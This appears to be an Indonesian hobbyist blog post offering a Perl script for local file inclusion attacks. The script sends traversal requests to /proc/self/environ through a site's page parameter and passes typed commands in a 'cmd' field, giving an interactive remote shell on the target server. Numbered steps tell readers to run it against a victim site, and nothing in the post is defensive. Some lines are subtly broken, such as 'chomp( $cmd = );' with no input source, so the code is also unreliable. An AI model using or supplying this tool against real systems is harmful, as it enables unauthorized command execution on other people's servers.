Local File Inclusion (LFI) Remote In Perl
Hallo sobat NubyChan
Disini saya mempunyai script untuk menjalankan/mengeksekusi LFI proc/elft/environ secara simple di shell
Berikut Codenya
- #! /usr/bin/perl
- use LWP;
- use HTTP::Request;
- if (@ARGV < 1)
- {
- print "\n==========================================\n";
- print " LFI Command Execution \n";
- print "==========================================\n";
- print "Usage: perl LFI.pl (without http:://)\n";
- print "Ex. perl FLI.pl www.korban.com/index.php?page=\n";
- exit;
- }
- $host=$ARGV[0];
- $lfi ="..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron";
- print "Try to Execution Command!\n";
- print "iDSc-shell# ";
- chomp( $cmd = );
- while($cmd !~ "exit")
- {
- $content = "";
- $ua = LWP::UserAgent->new();
- $ua->agent('');
- $request = HTTP::Request->new (GET =>"http://".$host.$lfi."&cmd=".$cmd);
- $response = $ua->request ($request);
- $content = $response->content;
- print $content."\n";
- print "iDSc-shell# ";
- chomp( $cmd = );
- }
Bagaimana Cara Menggunakannya?
1. Install perl di komputer andaa.
2. Save code di atas dengan nama : "LFI.pl".
3. Kemudian jalankan dengan perintah:" perl LFI.pl www.targetllu.com/index.php?page=\n "
4. Tunggu Hasilnya
SELAMAT MENCOBA